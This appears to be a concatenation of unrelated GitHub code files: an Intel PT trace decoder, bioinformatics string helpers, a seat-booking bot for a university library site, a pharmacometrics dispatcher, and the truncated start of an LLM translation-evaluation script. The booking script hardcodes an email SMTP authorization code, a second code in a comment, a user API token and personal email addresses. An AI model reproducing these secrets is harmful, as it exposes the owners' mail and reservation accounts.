pprint\nfrom zipfile import ZipFile\nfrom datetime import datetime, timedelta\nimport tempfile\nimport logging\n\nimport iptanalyzer.pyipt\nimport windbgtool.debugger\n\nclass Loader:\n def __init__(self, dump_filename = '', load_image = False, dump_instructions = False, dump_symbols = True, temp_directory = '', debug_level = 0): \n self.debug_level = debug_level\n self.dump_instructions = dump_instructions\n self.dump_symbols = dump_symbols\n self.load_image = load_image\n self.load_image_ranges = []\n self.loaded_modules = {}\n self.no_map_addresses = {}\n\n self.address_list = None\n self.psb_offsets = []\n self.records = []\n\n if temp_directory:\n self.temp_directory = temp_directory\n else:\n self.temp_directory = tempfile.gettempdir()\n\n if dump_filename:\n self.debugger = windbgtool.debugger.DbgEngine()\n self.debugger.load_dump(dump_filename)\n self.address_list = self.debugger.get_address_list()\n\n if self.dump_symbols:\n self.debugger.enumerate_modules()\n else:\n self.debugger = None\n\n def open(self, pt_filename, start_offset = 0, end_offset = 0):\n self.start_offset = start_offset\n self.end_offset = end_offset\n\n self.loaded_modules = {}\n self.no_map_addresses = {}\n\n self.ipt_decoder = iptanalyzer.pyipt.iptdecoder()\n self.ipt_decoder.open(pt_filename, self.start_offset , self.end_offset)\n\n def close(self):\n self.debugger.close_dump()\n\n def __extract_ipt(self, pt_zip_filename, pt_filename ):\n if not os.path.isfile(pt_filename):\n logging.info(\"* Extracting test trace file:\")\n with ZipFile(pt_zip_filename, 'r') as zf:\n zf.extractall()\n\n def __get_hex_line(self, raw_bytes):\n raw_line = ''\n for byte in raw_bytes:\n raw_line += '%.2x ' % (byte % 256)\n \n def dump_memory(self, base_address, region_size):\n dump_filename = os.path.join(self.temp_directory, '%x.dmp' % base_address)\n writemem_cmd = '.writemem %s %x L?%x' % (dump_filename, base_address, region_size)\n self.debugger.run_command(writemem_cmd)\n\n if not os.path.isfile(dump_filename):\n logging.error('dump_memory failed: dump_filename (%s) does not exists' % dump_filename)\n return (0, '')\n\n dump_file_size = os.path.getsize(dump_filename)\n if dump_file_size < region_size:\n logging.error('dump_memory failed: dump_filename (%s) is too short (%x vs %x)' % (dump_filename, os.path.getsize(dump_filename), region_size))\n region_size = dump_file_size\n\n return (region_size, dump_filename)\n\n def add_image(self, address, use_address_map = True, load_module_image = True):\n if address in self.no_map_addresses:\n return False\n\n range_list = []\n if load_module_image:\n if use_address_map and self.address_list:\n for mem_info in self.address_list:\n if mem_info['BaseAddr'] <= address and address < mem_info['EndAddr']:\n range_list.append((mem_info['BaseAddr'], mem_info['RgnSize']))\n logging.debug('add_image mem_info: %s' % (pprint.pformat(mem_info)))\n break\n\n if len(range_list) == 0:\n address_info = self.debugger.get_address_info(address)\n if address_info:\n if self.dump_symbols and 'Module Name' in address_info:\n module_name = address_info['Module Name'].split('.')[0]\n self.debugger.load_symbols([module_name, ])\n\n range_list.append((int(address_info['Base Address'], 16), int(address_info['Region Size'], 16))) \n\n if len(range_list) == 0:\n range_list.append((address & 0xFFFFFFFFFFFFF000, 0x1000))\n range_list.append((address & 0xFFFFFFFFFFFFFF00, 0x100))\n range_list.append((address & 0xFFFFFFFFFFFFFFF0, 0x10))\n\n for (base_address, region_size) in range_list:\n if self.debug_level > 1:\n logging.debug('add_image address: try to dump base_address: %.8x region_size: %x' % (base_address, region_size))\n\n if base_address in self.loaded_modules:\n loaded_region_size = self.loaded_modules[base_address]\n if base_address + loaded_region_size > address:\n logging.debug('add_image cached base_address: %.8x loaded_region_size: %x' % (base_address, loaded_region_size))\n return True\n\n (loaded_region_size, dump_filename) = self.dump_memory(base_address, region_size)\n if loaded_region_size != 0 and address < base_address + loaded_region_size:\n region_size = loaded_region_size\n break\n\n if base_address + region_size <= address:\n self.no_map_addresses[address] = True\n return False\n\n if self.debug_level > 1:\n logging.debug('add_image base_address: %.8x region_size: %x' % (base_address, region_size))\n\n self.ipt_decoder.add_image(base_address, dump_filename)\n self.loaded_modules[address] = region_size\n self.loaded_modules[base_address] = region_size\n return True\n\n def is_in_load_image_range(self, address):\n if len(self.load_image_ranges) == 0:\n return True\n\n for (start_address, end_address) in self.load_image_ranges:\n if start_address <= address and address <= end_address:\n return True\n\n return False\n\n def add_load_image_address_range(self, start_address, end_address):\n self.load_image_ranges.append((start_address, end_address))\n\n def enumerate_sync_offsets(self):\n sync_offsets = []\n\n while 1:\n sync_offset = self.ipt_decoder.get_sync_offset()\n sync_offsets.append(sync_offset)\n\n if not self.ipt_decoder.forward_block_sync():\n break\n\n return sync_offsets\n\n def decode(self, decode_type = 'block', callback = None):\n if decode_type == 'block':\n self.records = []\n self.psb_offsets = []\n\n pt_no_map_error_counts = {}\n while 1:\n if decode_type == 'block':\n decoded_obj = self.ipt_decoder.decode_block()\n if not decoded_obj:\n break\n\n end_address = decoded_obj.end_ip\n else:\n decoded_obj = self.ipt_decoder.decode_instruction()\n if not decoded_obj:\n break\n\n end_address = decoded_obj.ip\n\n if not decoded_obj:\n break\n\n address = decoded_obj.ip\n skip_to_next_sync = False\n decode_status = self.ipt_decoder.get_decode_status()\n offset = self.ipt_decoder.get_offset()\n\n if decode_status == iptanalyzer.pyipt.pt_error_code.pte_ok or decode_status == iptanalyzer.pyipt.pt_error_code.pte_bad_insn:\n if decode_status != iptanalyzer.pyipt.pt_error_code.pte_ok:\n logging.error(\"%.8x: ip: %.16x decode_status: %x (continue)\" % (offset, address, decode_status))\n\n if self.debug_level > 2:\n sync_offset = self.ipt_decoder.get_sync_offset()\n logging.debug(\"%.8x: decode: sync_offset: %.16x ip: %.16x\" % (offset, sync_offset, address))\n \n if callback:\n callback(decoded_obj)\n else:\n return decoded_obj\n\n elif decode_status == iptanalyzer.pyipt.pt_error_code.pte_eos:\n logging.debug(\"%.8x: ip: %.16x decode_status(pte_eos): %x\" % (offset, address, decode_status))\n break\n\n elif decode_status == iptanalyzer.pyipt.pt_error_code.pte_nomap:\n if self.debug_level > 1:\n logging.debug(\"%.8x: ip: %.16x decode_status(pte_nomap): %x\" % (offset, address, decode_status))\n\n if not address in pt_no_map_error_counts:\n pt_no_map_error_counts[address] = 1\n else:\n pt_no_map_error_counts[address] += 1\n\n skip_to_next_sync = True\n \n if pt_no_map_error_counts[address] > 1:\n logging.error(\"%.8x: add_image failed %d times for %.16x\" % (offset, pt_no_map_error_counts[address], address))\n elif self.load_image:\n if self.add_image(address):\n if self.debug_level > 1:\n logging.debug(\"%.8x: add_image succeed for %.16x\" % (offset, address))\n skip_to_next_sync = False\n else:\n if self.debug_level > 1:\n logging.debug(\"%.8x: add_image failed for %.16x\" % (offset, address))\n else:\n logging.error(\"%.8x: ip: %.16x decode_status: %x\" % (offset, address, decode_status))\n skip_to_next_sync = True\n\n if skip_to_next_sync:\n logging.debug(\"%.8x: forward_block_sync @%.16x\" % (offset, address))\n if not self.ipt_decoder.forward_block_sync():\n logging.debug(\"%.8x: forward_block_sync failed for %.16x\" % (offset, address))\n break\n return None\n\n def record_block_offset(self, block):\n address = block.ip\n block_end_address = block.end_ip\n cr3 = self.ipt_decoder.get_current_cr3()\n sync_offset = self.ipt_decoder.get_sync_offset()\n offset = self.ipt_decoder.get_offset()\n\n if self.debug_level > 1:\n logging.debug(\"%.8x: record_block_offsets: sync_offset: %.16x cr3: %.16x ip: %.16x\" % (offset, sync_offset, cr3, address))\n\n self.records.append({'IP': address, 'EndIP': block_end_address, 'SyncOffset': sync_offset, 'Offset': offset, 'CR3': cr3})\n\n def record_block_offsets(self):\n self.decode(decode_type = 'block', callback = self.record_block_offset)\n\n def decode_blocks(self, offset = 0, start_address = 0, end_address = 0):\n while 1:\n block = self.decode(decode_type = 'block')\n if not block:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n\n if offset > 0:\n if offset == current_offset:\n yield block\n elif offset < current_offset:\n break\n else:\n if (start_address == 0 and end_address == 0) or start_address <= block.ip and block.ip <= end_address:\n yield block\n\n def decode_instructions(self, offset = 0, start_address = 0, end_address = 0, stop_address = 0):\n while 1:\n instruction = self.decode(decode_type = 'instruction')\n if not instruction:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n if offset > 0:\n if offset == current_offset:\n yield instruction\n\n if offset < current_offset:\n break\n else:\n if (start_address == 0 and end_address == 0) or start_address <= instruction.ip and instruction.ip <= end_address:\n yield instruction\n\n if stop_address != 0 and instruction.ip == stop_address:\n break\n\n def decode_ranges(self, sync_offset = 0, ranges = []):\n if sync_offset > 0:\n self.ipt_decoder.set_instruction_sync_offset(sync_offset)\n\n stop_addresses = {}\n for (start_address, end_address) in ranges:\n stop_addresses[end_address] = 1\n\n while 1:\n instruction = self.decode(decode_type = 'instruction')\n if not instruction:\n break\n\n current_offset = self.ipt_decoder.get_offset()\n current_sync_offset = self.ipt_decoder.get_sync_offset()\n\n for (start_address, end_address) in ranges:\n if start_address <= instruction.ip and instruction.ip <= end_address:\n logging.debug('%.16x: instruction.ip: %.16x' % (current_offset, instruction.ip))\n if instruction.ip in stop_addresses:\n logging.debug(\"* Found instruction.ip (%x) in stop_addresses\" % instruction.ip)\n del stop_addresses[instruction.ip]\n logging.debug('\\tlen(stop_addresses): %d' % len(stop_addresses))\n\n yield instruction\n break\n\n if len(stop_addresses) == 0:\n break\n\n if current_sync_offset > sync_offset:\n break\n","repo_name":"ohjeongwook/iptanalyzer","sub_path":"src/iptanalyzer/ipt.py","file_name":"ipt.py","file_ext":"py","file_size_in_byte":13029,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"3"} +{"seq_id":"74195258962","text":"import re\nimport itertools\n\ndef extract(dna_strings=\"\"):\n dna_dict = {}\n current_dna_name = \"\"\n for line in dna_strings.splitlines():\n if line.startswith(\">\"):\n current_dna_name = line.replace(\">\", \"\")\n dna_dict[current_dna_name] = \"\"\n else:\n dna_dict[current_dna_name] += line.strip()\n return dna_dict\n\n\ndef find_motif(strand=\"GATATATGCATATACTT\", motif=\"ATAT\"):\n positions = {}\n strand_index = 0\n while re.search(motif, strand[strand_index:]) is not None:\n m = re.search(motif, strand[strand_index:])\n start = strand_index + m.start()\n content = m.group()\n if start not in positions:\n positions[start] = content\n strand_index = start + 1\n return positions\n\n\ndef sort_dict(input_dict={}):\n result = {}\n for key in sorted(input_dict.keys()):\n result[key] = input_dict[key]\n return result\n\n\ndef get_codon_protein_dict():\n dict_codon_protein = {}\n with open(\"rna_codon_table\", \"r\") as codon_file:\n codons_names = codon_file.read().split()\n for i in range(0, len(codons_names), 2):\n codon = codons_names[i]\n name = codons_names[i + 1]\n dict_codon_protein[codon] = name\n # print(codon_dict)\n return dict_codon_protein\n\n\ndef get_protein_codon_dict():\n dict_protein_codon = {}\n with open(\"rna_codon_table\", \"r\") as codon_file:\n codons_names = codon_file.read().split()\n for i in range(0, len(codons_names), 2):\n codon = codons_names[i]\n protein = codons_names[i + 1]\n if protein in dict_protein_codon:\n dict_protein_codon[protein].append(codon)\n else:\n dict_protein_codon[protein] = [codon]\n # print(codon_dict)\n return dict_protein_codon\n\n\ndef get_complement(dna_strand) -> str:\n complements = get_complement_dict()\n\n complement_strand = []\n for nt in dna_strand:\n complement_strand.append(complements[nt])\n return \"\".join(complement_strand)\n\n\ndef get_complement_dict():\n complements = {\"A\": \"T\", \"G\": \"C\"}\n revd = dict()\n for i in complements.items():\n revd[i[1]] = i[0]\n complements.update(revd)\n return complements\n\n\ndef find_start_codon(reading_frame=\"\", start=0) -> int:\n start_codon = get_protein_codon_dict()[\"M\"]\n\n for pos in range(start, len(reading_frame) - 3):\n try_codon = reading_frame[pos:pos + 3].replace(\"T\", \"U\")\n if try_codon in start_codon:\n return pos\n return -1\n\n\ndef transcribe_until_stop(reading_frame=\"\", start=0):\n proteins = []\n protein_codon_dict = get_protein_codon_dict()\n codon_protein_dict = get_codon_protein_dict()\n stop_codons = protein_codon_dict[\"Stop\"]\n for pos in range(start, len(reading_frame), 3):\n codon = reading_frame[pos:pos + 3].replace(\"T\", \"U\")\n if codon in stop_codons:\n break\n else:\n proteins.append(codon_protein_dict[codon])\n return proteins\n\n\ndef transcribe_rna_aminoacids(rna_string=\"\"):\n codon_name_dict = get_codon_protein_dict()\n aminoacids = []\n for i in range(0, len(rna_string), 3):\n codon = str(rna_string[i:i + 3])\n if codon not in codon_name_dict:\n return None\n else:\n aminoacid = codon_name_dict[codon]\n aminoacids.append(aminoacid)\n if len(aminoacids) == 0 or aminoacids[len(aminoacids)-1] != \"Stop\":\n return None\n else:\n return aminoacids\n\n\ndef close_at_stop(strand=\"\"):\n codons = []\n\n stop_codons = get_protein_codon_dict()[\"Stop\"]\n for pos in range(0,len(strand),3):\n codon = strand[pos:pos + 3].replace(\"T\", \"U\")\n codons.append(codon)\n if codon in stop_codons:\n break\n\n return \"\".join(codons)\n\n\ndef get_start_stop_regions(rna_string=\"\"):\n start_stop_regions = []\n pos = 0\n while pos >= 0:\n pos = find_start_codon(rna_string, pos)\n if pos >= 0:\n remaining = close_at_stop(rna_string[pos:])\n start_stop_regions.append(remaining)\n pos += 1\n return start_stop_regions\n\n\ndef get_reading_frames(dna_strand=\"\"):\n possible_reading_frames = []\n for i in range(3):\n possible_reading_frames.append(dna_strand[i:])\n return possible_reading_frames\n\n\ndef get_all_substrings(strand=\"\"):\n length = len(strand)\n substrings = []\n\n for start in range(length):\n for end in range(start+1,length+1):\n substring = strand[start:end]\n substrings.append(substring)\n return substrings\n\ndef get_dict_pos_substring(strand=\"\"):\n length = len(strand)\n dict_pos_substring = {}\n\n for start in range(length):\n for end in range(start + 1, length + 1):\n substring = strand[start:end]\n if start not in dict_pos_substring:\n dict_pos_substring[start] = [substring]\n else:\n dict_pos_substring[start].append(substring)\n\n return dict_pos_substring\n\n\ndef get_subsequences_of_length(strand=\"ABCDEF\", length=4):\n perm_source = []\n for i in range(len(strand)):\n perm_source.append(i)\n\n perms = itertools.permutations(perm_source, length)\n\n list_perms = []\n\n for perm in perms:\n list_perm = sorted(list(perm))\n if list_perm not in list_perms:\n list_perms.append(list_perm)\n\n list_subsequences = []\n for list_perm in list_perms:\n subsequence_characters = []\n for position in list_perm:\n subsequence_characters.append(strand[position])\n list_subsequences.append(\"\".join(subsequence_characters))\n\n return list_subsequences\n\n\ndef get_subsequences_all_lengths(strand=\"ABCDEF\"):\n all_subseqs = []\n for i in range(1, len(strand)+1):\n all_subseqs.extend(get_subsequences_of_length(strand, i))\n\n return all_subseqs\n","repo_name":"denizcetiner/rosalindpractice","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1286175647","text":"# -*- coding: utf8 -*-\r\nimport re\r\nimport os\r\nimport json\r\nimport smtplib\r\nimport logging\r\nimport requests\r\nfrom threading import Thread\r\nfrom datetime import datetime\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.application import MIMEApplication\r\n# 日志相关\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.WARNING)\r\n\r\n\r\nclass Book(Thread):\r\n host = 'https://libreserve.sdust.edu.cn'\r\n state_dict = {\r\n 1: '预约中',\r\n 2: '已进入',\r\n 3: '已离开',\r\n 4: '已取消',\r\n 5: '已失效'\r\n }\r\n\r\n def __init__(self, user, token, isContinue, email_adress):\r\n super(Book, self).__init__()\r\n self.user = user\r\n self.token = token\r\n self.email_adress = email_adress\r\n self.output_json = {}\r\n self.headers = {}\r\n self.output_json['user'] = self.user\r\n self.isContinue = isContinue\r\n self.headers['authorization'] = self.token\r\n self.can_order_type = [2]\r\n self.order_type_index = 0\r\n self.type_number = self.can_order_type[self.order_type_index]\r\n\r\n # 预定函数\r\n def run(self):\r\n # 核实状态\r\n self.check_state()\r\n if self.isContinue:\r\n self.cancel_recored()\r\n else:\r\n if self.state == '已进入':\r\n self.output_json['state'] = self.state\r\n self.output_json['msg'] = '您已进入{}'.format(self.seat_number)\r\n return\r\n elif self.state == '预约中':\r\n self.output_json['state'] = self.state\r\n self.output_json['msg'] = '您已预约{}'.format(self.seat_number)\r\n return \r\n self.output_json['msg'] = self.order()\r\n self.output_json['state'] = self.state\r\n # 邮件通知\r\n if self.state == '续约成功':\r\n self.send_email('{},续约状态: {}'.format(self.user, self.state), str(self.output_json))\r\n elif self.state == '预约成功':\r\n self.send_email('{},抢到座位啦-{}'.format(self.user, self.seat_number), str(self.output_json))\r\n\r\n # 检查用户状态\r\n def check_state(self):\r\n url_history = '/api/homeapi/user/getMyOrderRecored?page=1&pageSize=15'\r\n r = requests.get(self.host + url_history, headers=self.headers)\r\n recent_recored = json.loads(r.text)['data'][0]\r\n status = recent_recored['status']\r\n self.state = self.state_dict[status]\r\n if status >= 4: # 取消或失效\r\n # 改成send_email\r\n print('{},未检测到预约信息,为您预约中...'.format(\r\n self.user))\r\n elif status == 1: # 预约中\r\n self.seat_number = recent_recored['address']\r\n elif status == 2: # 已进入\r\n self.seat_number = recent_recored['address']\r\n if (datetime.now()-datetime.strptime(recent_recored['enter_time'], r'%Y-%m-%d %H:%M:%S')).seconds / 1000 < 20:\r\n current_hour = datetime.now().hour\r\n if current_hour in [7, 8]:\r\n self.send_email('{},早上好,很高兴见到您'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif current_hour in [13, 14]:\r\n self.send_email('{},下午好,老朋友,又见到您了'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif current_hour in [18, 19, 20]:\r\n self.send_email('{},晚上好,坚持就是胜利!加油~'.format(self.user), '祝您心情舒畅,学习愉快~\\n学习之余,记得喝水哦,多活动活动')\r\n elif recent_recored['status'] == 3: # 已离开\r\n if (datetime.now() - datetime.strptime(recent_recored['leave_time'], r'%Y-%m-%d %H:%M:%S')).seconds / 1000 < 20:\r\n current_hour = datetime.now().hour\r\n if current_hour in [11, 12, 13]:\r\n self.send_email('忙碌了一上午的{},检测到您已离开图书馆'.format(self.user), '好好吃饭睡觉呀,抢座还是交给我吧,我在马不停蹄滴抢座中...')\r\n elif current_hour in [17, 18]:\r\n self.send_email('学了了一下午了,{},检测到您已离开图书馆'.format(self.user), '好好吃饭,抢座还是交给我吧,我在马不停蹄滴抢座中...')\r\n elif current_hour in [20, 21, 22, 23]:\r\n self.send_email('夜深了,{},注意保暖,明天再来哟~'.format(self.user), '回去好好睡觉,忙碌了一天了,我也该休息了,晚安,好梦,good night~')\r\n\r\n # 预定座位\r\n def order(self):\r\n url_get_seat = '/api/homeapi/user/userOrderRoom?type={}'.format(self.type_number)\r\n r = requests.get(self.host + url_get_seat, headers=self.headers)\r\n r.encoding = 'utf-8'\r\n data = json.loads(r.text)\r\n seat_number = re.findall('\\d+', data['msg'])\r\n if '排队' in data['msg']:\r\n if self.order_type_index + 1 < len(self.can_order_type):\r\n self.type_number = self.can_order_type[self.order_type_index+1]\r\n return self.order()\r\n else:\r\n self.state = '续约失败' if self.isContinue else '预约失败'\r\n return '在抢了,在抢了,很快就会有的...'\r\n elif 'downloading' in data['msg'] or '重新预约' in data['msg']:\r\n return self.order()\r\n elif len(seat_number):\r\n self.state = '续约成功' if self.isContinue else '预约成功'\r\n print(self.state)\r\n self.seat_number = seat_number[0]\r\n return '预约成功-{}'.format(self.seat_number)\r\n\r\n # 取消预订\r\n def cancel_recored(self):\r\n url_cancel = '/api/homeapi/user/cancelRecored?type={}'.format(\r\n self.type_number,)\r\n r = requests.get(self.host + url_cancel, headers=self.headers)\r\n data = json.loads(r.text)\r\n return data['msg']\r\n\r\n # 发送邮箱信息\r\n def send_email(self, s, c):\r\n msg_Sender = '277611581@qq.com' # 发送方邮箱\r\n # 发送方邮箱的授权码aoqgeoezwnmcbigb(小号) abmiysvgtsfjdicd(大号)\r\n msg_code = 'aoqgeoezwnmcbigb'\r\n if len(self.email_adress):\r\n msg_Receiver = self.email_adress # 收件人邮箱\r\n else:\r\n self.output_json['email'] = '未提供邮箱信息'\r\n return\r\n\r\n subject = s # 主题\r\n content = c # 正文\r\n msg = MIMEText(content, 'plain', 'utf-8')\r\n\r\n msg['Subject'] = subject\r\n msg['From'] = msg_Sender\r\n msg['To'] = msg_Receiver\r\n try:\r\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 邮件服务器及端口号\r\n s.login(msg_Sender, msg_code)\r\n s.sendmail(msg_Sender, msg_Receiver, msg.as_string())\r\n self.output_json['email'] = True\r\n except Exception as e:\r\n self.output_json['email'] = False\r\n finally:\r\n s.quit()\r\n\r\n # 一言\r\n def get_hitokoto(self):\r\n r = requests.get(\r\n 'https://international.v1.hitokoto.cn/', headers=self.headers)\r\n data = json.loads(r.text)\r\n return '{hitokoto}'.format(**data)\r\n\r\n\r\n# 信息查询\r\ndef get_info():\r\n host = 'https://libreserve.sdust.edu.cn'\r\n url_get_info = '/api/homeapi/Index/getStatisticDataByType?type=2'\r\n r = requests.get(host + url_get_info)\r\n data = json.loads(r.text)['data']\r\n print('室内人数:{onRoomNum} | 预约人数:{orderNum} | 剩余座位:{canOrderNum} | 今日人流量:{todayTrfficNum}'.format(**data))\r\n # 获取等待用户数据\r\n url_get_wait = '/api/homeapi/Index/getWaitingUserList?&page=1&pageSize=15'\r\n r = requests.get(host + url_get_wait)\r\n data = json.loads(r.text)['data']\r\n print('当前等待: {}位'.format(len(data)))\r\n for user in data:\r\n print('姓名:{name} | 时间:{wait_minutes}'.format(**user))\r\n\r\n\r\ndef main(*args):\r\n # 判断运行状态\r\n isContinue = datetime.now().minute % 30 == 0 and datetime.now().second < 6\r\n # 输出关键信息\r\n try:\r\n get_info()\r\n except:\r\n print('[运行状态]: 获取信息失败')\r\n print('[运行模式]: ' + ('续约中...' if isContinue else '抢座中...'))\r\n # 创建线程\r\n all_user_threads_dict = {}\r\n test_dict = {'Polygon': 'bfd5b2201042a6508f8381a65b9f596b | 33699@outlook.com'}\r\n for key, value in test_dict.items():\r\n if re.match('[\\w\\d]{32}.*', value):\r\n if '|' in value:\r\n token, email_address = value.split(' | ')\r\n else:\r\n token = value\r\n email_address = ''\r\n all_user_threads_dict[key] = Book(\r\n key, token, isContinue, email_address)\r\n for user, book in all_user_threads_dict.items():\r\n book.start()\r\n for user, book in all_user_threads_dict.items():\r\n book.join()\r\n all_output_json = {}\r\n for user, book in all_user_threads_dict.items():\r\n print(book.output_json)\r\n all_output_json[user] = book.output_json\r\n return all_output_json\r\nmain()\r\n","repo_name":"MuiseDestiny/Library","sub_path":"图书馆-9-28.py","file_name":"图书馆-9-28.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37204785319","text":"\"\"\"\"\r\n## Function written to match MATLAB function mf_all()\r\n## Then manually adjusted to make work\r\n\r\n\r\n## Author: Caiya Zhang, Yuchen Zheng\r\n\"\"\"\r\n\r\n\r\nfrom project.mf3 import mf3\r\nfrom project.mf7 import mf7\r\nfrom project.util import get_dict_value\r\n\r\n\r\ndef mf_all(model_switch, xt_ind, x, a, bpop, d, sigma, docc, pypkpd_db):\r\n\r\n iFIMCalculationType = get_dict_value(pypkpd_db, \"settings\", \"iFIMCalculationType\") + 1\r\n returnArgs = None\r\n if iFIMCalculationType == 1:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Default (with no assumption that bpop and b are uncorrelated)\r\n elif iFIMCalculationType == 2:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM\r\n elif iFIMCalculationType == 3:\r\n raise Exception(\"Not yet implemented\")\r\n elif iFIMCalculationType == 4:\r\n raise Exception(\"Not yet implemented\")\r\n elif iFIMCalculationType == 5:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM with derivative of SD sigma\r\n elif iFIMCalculationType == 6:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #FULL FIM parameterized with A,B,C matrices & derivative of variance\r\n elif iFIMCalculationType == 7:\r\n returnArgs = mf7(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Calculate one model switch at a time, good for large matrices\r\n elif iFIMCalculationType == 8:\r\n returnArgs = mf3(model_switch,xt_ind,x,a,bpop,d,sigma,docc,pypkpd_db) #Reduced FIM parameterized with A,B,C matrices & derivative of variance\r\n\r\n if returnArgs is None: \r\n raise Exception(\"Unknown FIM-calculation type\")\r\n \r\n return returnArgs","repo_name":"felixzheng02/pypkpd","sub_path":"project/mf_all.py","file_name":"mf_all.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"38429499283","text":"from datasets import load_dataset\nfrom datasets import Dataset\nimport json\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoConfig, AutoTokenizer, BitsAndBytesConfig, AutoTokenizer, TrainingArguments\nfrom peft import LoraConfig, get_peft_model\nfrom trl import SFTTrainer\nfrom huggingface_hub import login\nfrom accelerate import infer_auto_device_map, init_empty_weights\n\n### ============ Parameters ==================\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\nmodel_name = \"pankajmathur/orca_mini_v3_7b\"\n\ndataset_name = \"en_de\" ### [\"en_de\", \"en_es\", \"en_zh\"]\n### ============ Parameters ==================\n\n\n### Prompt generation template >>> begin\n\n# GENERAL_INSTRUCTION = \"\"\"\n# The task is to score a translated text from {English} to {German} with respect to the source sentence on a continous scale from 0 to 100,\n# along with explaination in JSON format with \"score\" and \"explanation\" keys as follows: {\"score\": , \"explanation\": }.\n# Where a score of zero means \"no meaning preserved and poor translation quality\" and score of one hundred means \"excellant translation quality with perfect meaning and grammar\".\n# You must justify the score that you provided with clear and concise reason within 2 sentences interms of justifying the adequacy, fluency, faithfulness metrics.\n# The source sentence and target sentence is given in triple backticks with ### source sentence: and ### target sentence: as prefix respectively.\n# Note: The generated response must be in json format without any missed braces or incomplete text. Also, it should not provide any additional information other than JSON output.\n# \"\"\"\n\nGENERAL_INSTRUCTION = \"\"\"\nYou will be given one translated sentence in {Spanish} for a source sentence in {English}.\n\nYour task is to assign the single score for the translation on continuous scale from 0 to 100 along with explanation.\n\nPlease make sure you read and understand these instructions carefully. Please keep this document open while reviewing, and refer to it as needed. For explanation, you must justify the score that you provided with clear and concise reason within 2 sentences interms of justifying the adequacy, fluency and faithfulness metrics.\n\nThe source text and translation text is given in triple backticks ``` with \"Source Text:\" and \"Translation:\" as prefix respectively.\n\nEvaluation Criteria:\n1) Adequacy (1-5) - the correspondence of the target text to the source text, including the expressive means in translation. Annotators were instructed to penalize translation which contained misinformation, redundancies and excess information. Here, 1 is the lowest and 5 is the highest.\n2) Faithfulness (1-5) - translation faithfulness to the meaning depends on how the translator interprets the speaker's intention and does not imply that one should never or always translate literally. Here, 1 is the lowest and 5 is the highest.\n3) Fluency (1-3): the quality of the translation in terms of grammar, spelling, punctuation, word choice, and sentence structure.\n - 1: Poor. The translation has many errors that make it hard to understand or sound unnatural.\n - 2: Fair. The translation has some errors that affect the clarity or smoothness of the text, but the main points are still comprehensible.\n - 3: Good. The translation has few or no errors and is easy to read and follow.\n\nEvaluation Steps:\n1. Read the translation and the source document carefully.\n2. Compare the translation to the source text.\n3. Assign scores for Adequacy, Faithfulness and Fluency based on the Evaluation Criteria.\n4. By utilizing the generated scores of Adequacy, Faithfulness and Fluency, aggregate these scores to assign the single score for the translation on continuous scale from 0 to 100 along with explanation in JSON format with \"score\" and \"explanation\" keys as follows: {\"score\": , \"explanation\": }.\n\"\"\"\n\nMODEL_INPUT_TEMPLATE = {\n 'prompts_input_with_output': \"### Instruction: {}\\n### Source Text: ```{}```\\n### Translation: ```{}```\\n### Response: {}\",\n 'prompts_input_without_output': \"### Instruction: {}\\n### Source Text: ```{}```\\n### Translation: ```{}```\\n### Response: \",\n 'output_separator': \"Response: \"\n}\n\nprompt_input_with_output = MODEL_INPUT_TEMPLATE['prompts_input_with_output']\nprompts_input_without_output = MODEL_INPUT_TEMPLATE['prompts_input_without_output']\n\n### Prompt generation template <<< end\n\n\ndef prepare_dataset(df, split_type = 'train'):\n final_data = []\n \n for i in range(df.shape[0]):\n instruction = \"\"\n\n text = df['SRC'].iloc[i]\n translation = \"\"\n if split_type in ['train', 'dev']:\n translation = df['HYP'].iloc[i]\n else:\n translation = df['TGT'].iloc[i]\n\n score = -1\n if split_type == \"train\":\n score = df['Score'].iloc[i]\n instruction = prompt_input_with_output.format(GENERAL_INSTRUCTION, text, translation, score)\n else:\n instruction = prompts_input_without_output.format(GENERAL_INSTRUCTION, text, translation)\n\n final_data.append({'text': instruction})\n\n # print(final_data[-1])\n return final_data\n\n\n\n# df = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_train.tsv\", delimiter = '\\t')\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'train'), columns = ['text'])\n# dataset = Dataset.from_pandas(modified_df)\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'dev'), columns = ['text'])\n# train_dataset = Dataset.from_pandas(modified_df)\n# del modified_df\n\n# df = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_dev.tsv\", delimiter = '\\t')\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'dev'), columns = ['text'])\n# dev_dataset = Dataset.from_pandas(modified_df)\n\ndf = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_test.tsv\", delimiter = '\\t')\nmodified_df = pd.DataFrame(data = 